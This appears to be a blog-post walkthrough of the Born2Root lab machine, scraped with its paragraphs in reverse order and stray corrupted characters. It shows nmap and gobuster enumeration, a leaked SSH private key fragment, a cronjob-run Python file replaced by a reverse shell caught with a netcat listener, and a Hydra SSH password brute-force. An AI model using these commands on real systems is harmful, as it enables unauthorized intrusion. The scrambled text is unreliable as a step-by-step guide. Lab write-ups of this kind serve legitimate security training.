We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password: su id host: 192.168.120.52 login: hadi password: hadi123ġ of 1 target successfully completed, 1 valid password found max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Now we can try brute-forcing the password for the user hadi using Hydra: hydra -t 4 -l hadi.txt -P passwords-mutated.txt 192.168.120.52 ssh The user Hadi stands out as another user also mentioned on the company cat /usr/share/wordlists/rockyou.txt | grep hadi > /home/kali/hadi.txt I then used the text file with Hydra to bruteforce SSH which actually worked. Let’s check /etc/passwd to get a list of available users on the system: cat /etc/passwdĭaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin $ python -c 'import pty Login Brute-Force bin/sh: 0: can't access tty job control turned off We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.Īfter a few minutes, we catch our shell: sudo nc -lvp 80ġ92.168.54.49: inverse host lookup failed: Unknown hostĬonnect to from (UNKNOWN) 52400 We can copy a Python reverse shell into the sekurity.py file chmod+x sekurity.py and wait 5 minutes for the cronjob to be executed. */5 * * * * jimmy python /tmp/sekurity.py Uid=1001(martin) gid=1001(martin) groups=1001(martin)Ĭhecking all the cronjobs scheduled on the system, we find a python file that is readable, and the cronjob is scheduled for a user named Jimmy. Let’s give this key proper permissions and then use it to SSH as martin (we can just hit enter when prompted for secret password). RlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+ MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wCĢo1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43 We will download the key and save it to a file. Gobuster finds a directory named /icons containing a text file VDSoyuAXiO.txt. locate gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt -url We will use GoBuster to do a brute force scan in an attempt to discover any other folders present on the web server using the common.txt wordlist. We should take note of the username martin that appears twice on this page: in the About Us section and in the Contact Us section. We have a web server running on port 80 and when browsing to the website, we find a company web page with general and contact related information. Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel |_http-server-header: Apache/2.4.10 (Debian) The first one will identify open ports, and the second one will attempt to discover more information about each service. We initiate our enumeration of the target by launching two nmap scans. Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |